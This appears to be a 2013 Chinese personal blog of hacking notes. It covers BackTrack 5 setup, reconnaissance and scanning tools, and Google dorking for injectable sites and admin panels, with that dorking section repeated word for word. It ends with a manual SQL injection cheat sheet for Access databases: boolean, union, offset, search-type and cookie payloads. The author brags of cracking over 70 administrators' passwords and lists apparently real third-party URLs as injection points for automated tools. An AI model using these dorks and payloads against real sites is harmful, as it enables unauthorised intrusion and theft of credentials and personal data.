2013年2月16日星期六
backtrack5 安装与汉化
1.默认next安装之后
startx进入图形界面
默认root密码toor
2.安装vm tools
tar -zxvf *.tar.gz 解压
解压成功之后转到解压出来的vmware-tools-distrib 目录
运行安装程序 vmware-install.pl
终端命令为 vmware-install.pl 安装完成之后重启
3.安装中文输入法
apt-get install language-pack-zh language-support-zh
默认安装ibus
然后 系统->首选项->IBUS首选项切换到 输入法选项卡,点添加左边的下拉列表框选择 汉语->拼 PINYIN
后点 添加 按钮
设置-系统设置-开机和关机-自动启动,到了这里面 有个添加程序按纽,点开后单击浏览按纽
找到ibus安装路径 ,默认情况下在/user/bin/ibus-daemon 选择ibus-daemo
4.系统汉化
找到系统盘--etc--apt--sources.list
把下面链接覆盖到里面
# deb cdrom:[Ubuntu 10.04.1 LTS _Lucid Lynx_ - Release i386 (20100816.1)]/ lucid main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://mirror.bjtu.edu.cn/ubuntu/ lucid main restricted
deb-src http://mirror.bjtu.edu.cn/ubuntu/ lucid main restricted
## Major bug fix updates produced after the final release of the
## distribution.
deb http://mirror.bjtu.edu.cn/ubuntu/ lucid-updates main restricted
deb-src http://mirror.bjtu.edu.cn/ubuntu/ lucid-updates main restricted
## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team. Also, please note that software in universe WILL NOT receive any
## review or updates from the Ubuntu security team.
deb http://mirror.bjtu.edu.cn/ubuntu/ lucid universe
deb-src http://mirror.bjtu.edu.cn/ubuntu/ lucid universe
deb http://mirror.bjtu.edu.cn/ubuntu/ lucid-updates universe
deb-src http://mirror.bjtu.edu.cn/ubuntu/ lucid-updates universe
## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## multiverse WILL NOT receive any review or updates from the Ubuntu
## security team.
deb http://mirror.bjtu.edu.cn/ubuntu/ lucid multiverse
deb-src http://mirror.bjtu.edu.cn/ubuntu/ lucid multiverse
deb http://mirror.bjtu.edu.cn/ubuntu/ lucid-updates multiverse
deb-src http://mirror.bjtu.edu.cn/ubuntu/ lucid-updates multiverse
## Uncomment the following two lines to add software from the 'backports'
## repository.
## N.B. software from this repository may not have been tested as
## extensively as that contained in the main release, although it includes
## newer versions of some applications which may provide useful features.
## Also, please note that software in backports WILL NOT receive any review
## or updates from the Ubuntu security team.
# deb http://mirror.bjtu.edu.cn/ubuntu/ lucid-backports main restricted universe multiverse
# deb-src http://mirror.bjtu.edu.cn/ubuntu/ lucid-backports main restricted universe multiverse
## Uncomment the following two lines to add software from Canonical's
## 'partner' repository.
## This software is not part of Ubuntu, but is offered by Canonical and the
## respective vendors as a service to Ubuntu users.
# deb http://archive.canonical.com/ubuntu lucid partner
# deb-src http://archive.canonical.com/ubuntu lucid partner
deb http://security.ubuntu.com.sixxs.org/ubuntu lucid-security main restricted
deb-src http://security.ubuntu.com.sixxs.org/ubuntu lucid-security main restricted
deb http://security.ubuntu.com.sixxs.org/ubuntu lucid-security universe
deb-src http://security.ubuntu.com.sixxs.org/ubuntu lucid-security universe
deb http://security.ubuntu.com.sixxs.org/ubuntu lucid-security multiverse
deb-src http://security.ubuntu.com.sixxs.org/ubuntu lucid-security multiverse
deb http://mirror.bjtu.edu.cn/ubuntu/ lucid-proposed restricted main multiverse universe
然后升级
apt-get update
安装
apt-get install language-selector
安装完成后在system--adminstrators--language support--install/remove language --chinese
等待下载完成后
text里 选择汉语
apply system-wide
ok重启
5.安装chrome
下载deb文件
安装 sudo dpkg -i xxx.deb
卸载 sudo dpkg -r xxx.deb
安装完成
无法以root用户运行
修改chrome的属性
/opt/google/chrome/google-chrome --user-data-dir
2013年2月14日星期四
backtrack之扫描工具
一.主机发现
1.asping
局域网内由于防护墙原因一个ip ping不通很正常,但arp解析不了就不正常了
所以就算不返回ICMP ECHO 也得回ARP ECHO
命令:arping -c 3 192.168.1.103
-c 3 操作3次
2.fping
说白了就是快速ping,也是使用ICMP ECHO,一次请求多台主机
命令:fping -s -r 1 -g 10.1.1.1 10.1.1.255
-s 输出最终的结果
-r 尝试次数
-g 扫描范围
3.genlist
和fping差不多只是输出结果更简洁
命令: genlist -s 10.1.1.\*
4.hping3
这玩意功能很强大,可以自定义数据包,但是不会用
eg:hping3 -c 3 10.1.1.100
hping3回车后可以自定义数据包
eg:
发包 hping send {ip(daddr=10.1.1.100)+icmp(type=8,code=0)}
收包 hping recv eth0
操作很难
5.nbtscan
扫描一个ip地址范围的NetBIOS名字信息,它将提供一个关于IP地址NetBIOS计算机名字
服务可用性,登录用户名和MAC地址的报告
这个命令扫描微软主机很好用的,速度很快
命令:nbtscan 10.1.1.1-254
6.nping
nping比hping3操作要简单的多了,也可以简单的自定义发包
nping工具容许用户产生各种网络数据包(TCP,UDP,ICMP,ARP)
也允许用户自定义协议头部,例如 源和目的,TCP和UDP的端口号。
命令
eg:nping -c 1 --tcp -p 80 --flags syn 10.1.1.1
发了一个syn的包,会RCVD收到一个SA(syn ack)的包
nping -c 1 --tcp -p 80 --flags ack 10.1.1.1
如果tcp端口没有开的话,我发ack的包,肯定会被服务器拒绝的,
因为没有达成tcp协议
nping -c 1 --udp -p 80 10.1.1.1(udp可没有flag)
如果udp端口没有开的话,,就端口不可达了会回一个ICMP的包
7.onesixtyone
onesixtyone是一个snmp(simple network monitoring protocol)扫描工具,用于找出设备上的SNMP
Community字串
扫描速度非常快
路径:/pentest/enumeration/snmp/onesixtyone
nano dict.txt 可以添加字典文件的
命令: ./onesixtyone -c dict.txt 10.1.1.1
r如果字典文件给力的话。。就ok,能爆出密码的
8.protos
protos这个软件主要用于扫描特定主机上所支持的协议,对扫路由器来说很好用的
路径:/pentest/enumeration/irpas
,命令:./protos -i eth0 -d 10.1.1.2 -v
-i 是接口
-d 路由器地址
-v 详细显示
二.操作系统指纹
1.p0f
一个被动的操作系统指纹监控工具,Cisco IPS就是利用这个程序获取被攻击目标的操作系统
路径:pentest/enumeration/irpos
p0f 直接回车监听,效果不怎么好
2.Xprobe2
主动OS指纹探测工具,主动发送各种包来探测目标是什么系统
命令: Xprobe2 10.1.1.1
三.端口扫描
1.AutoScan(图形化)
路径:Network Analysis/Network Scanners
功能不怎么强大
2.netifera
不仅可以扫描开放端口,还可抓包
局域网内扫描,抓包,密码之类的都能抓到
3.NMAP
NMAP是一个综合性的,并且特性丰富的扫描工具。是渗透测试者的必备工具,功能很强大
包含如下功能:
-Host discovery (主机发现)
-Service/version detection (服务版本检测)
-Operating system detection(操作系统检测)
-Network traceroute (网络追踪)
-Nmap Scripting Engine (NMAP脚本引擎)
命令:
nmap -v -n -sP 10.1.1.0/24
nmap -v -n -A 10.1.1.1
-v 显示扫描结果
-n 不做DNS解析,很慢的
-sP 通过ICMP ECHO 进行扫描
-A 扫描所有能扫描的信息
四.服务探测
1.Httprint
用于检测HTTP服务器的软件和版本
路径:/pentest/enuneration/www/httprint/linux
命令:./httprint -h 10.1.1.1 -s signatures.txt
2.Httsquash
和Httprint功能一样
路径:/pentest/scanners/httsquash
命令:./httpsquash -r 10.1.1.2
五.VPN扫描
1.ike-scan
是一个IKE扫描工具,主要用于探测IPSec VPN服务器支持策
命令: ike-scan -M -v 10.1.1.2
2.sslscan
命令:sslcan 10.1.1.2
2013年2月13日星期三
backtrack之信息收集
一DNS信息收集工具
1.Dnsenum
-使用google搜索引擎获取额外的名字或子域名
-使用txt文件暴力破解子域名
-使用whois查询c段网络范围,并且计算网络范围
-反向查询
-支持多重查询
Dnsenum路径:
cd /pentest/enumeration/dns/dnsenum
命令
eg: ./dnsenum.pl -f dns.txt --dnsserver ns1.cisco.com cisco.com(域名)-0 1.txt
./dnsenum.pl cisco.com 简单的访问查询
-f dns.txt 调用字典
--dnsserver ns1.cisco.com
8.8.8.8 询问官方的dns服务器
-o 1.txt 输出保存查询结果
Trying Zone Transfers and getting Bind Versions: 进行区域传送肯定会失败的
区域传送:主dns和被dns要同步dns数据库,就会做区域传送 所以一般非信任的dns服务 器肯定不容许你和它来这个的
dns的两个协议:
tcp53 只是在两个dns进行区域传送的时候才会用到
udp53 防火墙防的是udp的而不是tcp的,正常咱们询问的都是udp的
2.Dnsmap
Dnsmap非常类似于Dnseunm,可以使用内建的wordlsit来暴力破解子域,也可以自建字典
支持把结果输出为CSV格式,csv可以excel打开 并且运行时不需要root权限
Dnsmap路径:
cd /pentest/enumeration/dns/dnsmap
命令:
eg: ./dnsmap cisco.com -w wordlist_TLAs.txt -c cisco.csv
-w wordlist_TLAs.txt 指定暴力破解文件
-c cisco.csv 输出文件
cisco.com为目标域
二.路由信息收集
1.tcptraceroute
最传统的路由信息收集方法
命令:traceroute www.cisco.com
没有成功,因为传统的方式穿越防火墙的效果不怎么好
传统的traceroute技术发送UDP或者ICMP ECHO,但tcptracerroute发送TCP SYN包到目标
命令: tcptraceroute www.cisco.com
会看到能跳到open的端口
好处: 就算目标之前存在防火墙,他阻止了tracerroute的流量,但是适当tcp端口的流量防火墙是放行的,所以tcp能穿越防火墙抵达目的地
tcptracerroute收到SYN/ACK表示端口是开放的,收到RST表示端口是关闭的
2.tctrace
tctrace工具非常类似于tcptraceroute,他不使用ICMP ECHO 而是使用TCP SYN包
路径:
cd pentest/enumeration/irpas/
eg: ./tctrace -i eth0(网卡) -d www.cisco.com
效果和tcptraceroute一样的
三. All-in-one 智能收集工具
1. Maltego(图形化界面)
Maltego是一个开放源的智能信息收集工具
收集的东西很多
网站信息
-Domain names (域名)
-DNS name (DNS名)
-Whois infomation (whois信息)
-Network blocks (网段)
-IP addresses (ip地址)
个人信息
-公司或组织关联到的人
-电邮地址关联到的人
-网站关联到的人
-市区网络关联到的人
-电话号码关联到的人
路径:
dns analysis/maltego
使用方法:我就直接贴网上现有的把
link:http://wifibeta.com/2012-03/thread-675-1-1.html
我们来熟悉一下界面,侧栏是可以添加的切入点,选择已有的数据拖动添加到主窗体即可
可以看到这个软件还是偏向于收集网络化数据,切入点之多,功能之强大,令人惊叹。
以笔者邮箱为例,添加一个实例,从transform server获取所有可能的数据:
期间可能会要求确认相关协议或者信息,点击Accept即可。
可以看到,出现了相关联的数据:
经过判断初定wifibeta.com可能有其他有用的数据,可以以wifibeta.com为节点,继续从服务器获取信息:
数据像滚雪球一样越滚越大,不仅出现了站长留在Whois信息中的手机号(虽然此处是虚假的,但是有相当大部分站长的Whois数据都是真实有效的),还显示出郑州使用的CDN,域名注册商,组织名称等等。
通过一层层深入,我们获取到了电话的可用信息:
随后从网站上有更多可利用信息被获取:
拓扑看起来已经相当强大,这只是由一个Email可以获取到的信息!
如果我们只是有某人的名字,那么可以获取到什么信息呢?我们拿大名鼎鼎的乔布斯和比尔盖茨试试:
第一次展开,我们获取到了16个Facebook用户数据,2个电话号码,10个Email地址:
笔者以Email为线索,抓住@apple.com和@microsoft.com邮件层层深入,获取到了更多有效的信息:
至此拓扑非常强大,若有兴趣可以自行测试。
此外,拓扑还支持总线型,星形等拓扑,非常直观。
2013年2月12日星期二
googlehack信息收集
googlehack信息收集
google站点:
https://www.google.com.hk/
http://www.google.com.hk/webhp?hl=xx-hacker 黑客
http://www.google.com/custom?hl=zh-CN 中文
http://www.google.com/custom?hl=en 英文
一. google搜索引擎就是强大啊,记得之前爱用google是因为google的goagent翻墙代理,
还有他强大的chrome浏览器。虽然chrome老是不稳定,但用习惯了他的书签管理和在线翻译,就再也放不下chrome了,但由于chrome的hack插件是无法与firefox比拟的,相对来说各有优点,只有chrome,ie,firefox三剑走天涯了。但google的强大远远不仅仅在此,google是一个强大的搜索引擎,而对于黑客而言,则可能是一款绝佳的黑客工具。
下面先介绍一下google常用的几个搜索语法:
site: 找到与目标站点有关的url site:baidu.com
inurl: 搜索关带有键字的url inurl:Article_Class2.asp?
intext: 网页正文内的关键字 intext: to parent directory
intitle: 网页标题中的字符 intitle: 后台
filetype: 搜索指定类型的文件 filetype:.cbi .mdb .asp
info : 网站基本信息 info:baidu.com
link: 与站点链接的站 link:baidu.com
其实掌握着七个也就足够了,只要我们灵活的运用组合,还是能搜到自己想要的信息的。
个性化的组合,会使googel威力加倍。
二. 下面我们就来说说google的实际运用吧
1.批量寻找注入点
对于刚接触网络安全的朋友们可以利用 google语法 加 啊D ,就可以满足一下自己渴望入侵的心灵啦!说起这个。我就想起来我第一次搜索注入点时候就用了一个 inurl:Article_Class2.asp? 猜解到了70多个网站管理员的登录密码,当时差点让俺高兴死。
2.信息收集
举个例子吧,假如你想入侵一个网站202.201.112.98,首先
info: 202.201.112.98 基本信息
link:202.201.112.98 链接站
site:202.201.112.98 // 二级域名
site:202.201.112.98 filetype:mdb doc 下载数据库
site:202.201.112.98 inurl:asp? filetype:asp php jsp 寻找注入点
site:202.201.112.98 intext:ftp://*:* ftp地址
site:202.201.112.98 intext:管理|后台|验证码 寻找后台
site:202.201.112.98 inurl:robots.txt intext:User_agent 查找网站路径
site:202.201.112.98 inurl:upload.asp load file 寻找上传漏洞
site:202.201.112.98 intext:*@xxxx.com // intext:电话// 邮箱电话
看到网站下面的联系方式 google 姓名 手机号 邮箱 qq号 寻找网管信息
3.谷歌其他语法
allinurl 会比 inurl更精确
'能够搜到不拆开的关键字 如 伤心的鱼'
+ 把google可能忽略的字列出来
- 把某个字忽略
~ 同意词
. 单一的通配符
* 通配符,可代表多个字母
"" 精确查询
4.个人感觉几个好用的关键字2013-1-25
杭州 inurl:Article_Class2.asp?
北京 inurl:edit.asp?
NewsInfo.asp?id=
info.asp?id=
news_show.asp?id=
CompHonorBig.asp?id=
showproduct.asp?id=
inurl:website.php?id=
inurl:articleshow.asp?articleid=45 id随便改
allinurl: DownloadShow.asp?DownID= 后台boss 良精0day
google站点:
https://www.google.com.hk/
http://www.google.com.hk/webhp?hl=xx-hacker 黑客
http://www.google.com/custom?hl=zh-CN 中文
http://www.google.com/custom?hl=en 英文
一. google搜索引擎就是强大啊,记得之前爱用google是因为google的goagent翻墙代理,
还有他强大的chrome浏览器。虽然chrome老是不稳定,但用习惯了他的书签管理和在线翻译,就再也放不下chrome了,但由于chrome的hack插件是无法与firefox比拟的,相对来说各有优点,只有chrome,ie,firefox三剑走天涯了。但google的强大远远不仅仅在此,google是一个强大的搜索引擎,而对于黑客而言,则可能是一款绝佳的黑客工具。
下面先介绍一下google常用的几个搜索语法:
site: 找到与目标站点有关的url site:baidu.com
inurl: 搜索关带有键字的url inurl:Article_Class2.asp?
intext: 网页正文内的关键字 intext: to parent directory
intitle: 网页标题中的字符 intitle: 后台
filetype: 搜索指定类型的文件 filetype:.cbi .mdb .asp
info : 网站基本信息 info:baidu.com
link: 与站点链接的站 link:baidu.com
其实掌握着七个也就足够了,只要我们灵活的运用组合,还是能搜到自己想要的信息的。
个性化的组合,会使googel威力加倍。
二. 下面我们就来说说google的实际运用吧
1.批量寻找注入点
对于刚接触网络安全的朋友们可以利用 google语法 加 啊D ,就可以满足一下自己渴望入侵的心灵啦!说起这个。我就想起来我第一次搜索注入点时候就用了一个 inurl:Article_Class2.asp? 猜解到了70多个网站管理员的登录密码,当时差点让俺高兴死。
2.信息收集
举个例子吧,假如你想入侵一个网站202.201.112.98,首先
info: 202.201.112.98 基本信息
link:202.201.112.98 链接站
site:202.201.112.98 // 二级域名
site:202.201.112.98 filetype:mdb doc 下载数据库
site:202.201.112.98 inurl:asp? filetype:asp php jsp 寻找注入点
site:202.201.112.98 intext:ftp://*:* ftp地址
site:202.201.112.98 intext:管理|后台|验证码 寻找后台
site:202.201.112.98 inurl:robots.txt intext:User_agent 查找网站路径
site:202.201.112.98 inurl:upload.asp load file 寻找上传漏洞
site:202.201.112.98 intext:*@xxxx.com // intext:电话// 邮箱电话
看到网站下面的联系方式 google 姓名 手机号 邮箱 qq号 寻找网管信息
3.谷歌其他语法
allinurl 会比 inurl更精确
'能够搜到不拆开的关键字 如 伤心的鱼'
+ 把google可能忽略的字列出来
- 把某个字忽略
~ 同意词
. 单一的通配符
* 通配符,可代表多个字母
"" 精确查询
4.个人感觉几个好用的关键字2013-1-25
杭州 inurl:Article_Class2.asp?
北京 inurl:edit.asp?
NewsInfo.asp?id=
info.asp?id=
news_show.asp?id=
CompHonorBig.asp?id=
showproduct.asp?id=
inurl:website.php?id=
inurl:articleshow.asp?articleid=45 id随便改
allinurl: DownloadShow.asp?DownID= 后台boss 良精0day
寻找后台思路整理
1.搜索引擎查询
命令很多种列几种自己常用的吧:
site:heimian.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system
site:heimian.com inurl:login|admin|manage|manager|admin_login|login_admin|system
site:heimian.com intitle:管理|后台|登陆|
site:heimian.com intext:验证码
/admin/manage
/manage
==================================
2.工具
啊d 明小子
intellitamper 菜刀 jsky
================================================
3.查看图片文件的属性 看路径 看管理目录
=============================================
4. 查看网站使用的管理系统
=============================================
5.查看同ip上其他站的管理目录
曾经遇到过s
192.168.1.1:8000/Admin_Login.asp
====================================
6.robots.txt都在根目录下的
www.jynp.cn/robots.txt
site:www.jynp.cn inurl:robots.txt
intext:User_agent
=============================================
access手工注入基础整理
一.判断注入
数字型查询 and 1=1 and 1=2
字符型查询 'and '1'='1 'and'1'='2
二.数据库类型的判断
1.普通报错
JET引擎连接数据库 access
ODBC引擎连接数据库 mssql
2.手工猜解
;--
mssql数据库里 ;为语句间分隔符 --为解释符
所以mssql返回正确,access返回错误
3.access和mssql差异查询
and exists (select * from sysobjects) mssql返回无法读取
and exists (select * from mysysobjects) access返回无权限
三.access数据库手工注入(通用)
1.猜表
and exists (select * from 表名)
2.猜列
and (select 列名 from 表名)
3.猜列个数
and (select 列名 from 表名)=X 管理员个数
3.猜列长度
and (select top 1 len(列名) from 表名)=X 一般密码都md5加密16 32 40 位 用户名一般5位admin
4.猜字段内容
and (select top 1 asc(mid(列名,x,1)) from 表名)=xx 中文asc负数abs()函数
四.access数据库联合查询注入
1.猜列个数
排序法 order by X
覆盖法 and 1=2 union select 1,2,3,....x from 表名
2.猜字段内容
and 1=2 union select 1,2,3,4,..x from 表名
五. access偏移注入
1.从后往前偏移
-x 第一次 *前移自减直到显示出数据 x即admin中的列
-x-x 第二次 from (admin as a inner join admin as b on a.id=b.id) 无数据 再 在*前添加 *-1或a.id,b.id, 为了打得更乱
-x-x-x 第三次 from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id =b.id) 无数据再添c.id
-x-x-x-x 第四次 from(((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id =b.id) inner join admin as
d on a.id=d.id) 无数据再添d.id
2.从前往后偏移
and 1=2 union select *from( from (admin as a inner join admin as b on a.id=b.id )
and 1=2 union select * from ((select * from admin) as a inner join (select * from admin) as b on a.id=b.id) inner join (select * from admin) as c on c.id=a.id
六.搜索型注入
1.判断存在
%' and 1=1 and '%'='
%' and 1=2 and '%'='
a%' and 1=1-- 正常
a%' and 1=2-- 错误
2.get搜索型手工注入
猜表列
1%'and(select count(列名)from 表名)>0 and '%'='
猜列名长度
1%'and(select top 1 len(列名)from 表名) and '%'='
猜字段
1%'and(select top 1 asc(mid(列名,N,1))from 表名)>X and '%'='
3.get搜索型工具注入
注入点
http://www.sctone.com.cn/sctone/News_search.asp?key=1&otype=title& amp;Submit=Search
两种修改注入点关键字放最后
http://www.sctone.com.cn/sctone/News_search.asp?otype=title&Submit=Search&key=1
http://www.sctone.com.cn/sctone/News_search.asp?key=1
放进工具跑
nbsi hdsi 穿山甲
4.post搜索型工具注入
wsockexpert抓包 把关键字放到url的后面
http://www.cnaec.com.cn/Work/refer/Search/2.asp
http://www.cnaec.com.cn/Work/refer/Search/2.asp?KeyWord=1
放到工具跑
nbsi hdsi pangolin
七.cookies注入
1.cookies的注入语句:
javascript:alert(document.cookie="id="+escape("ID值 and 注入攻击代码"));
2.cookies工具注入
利用cookies注入中转工具修改url
本地搭建服务器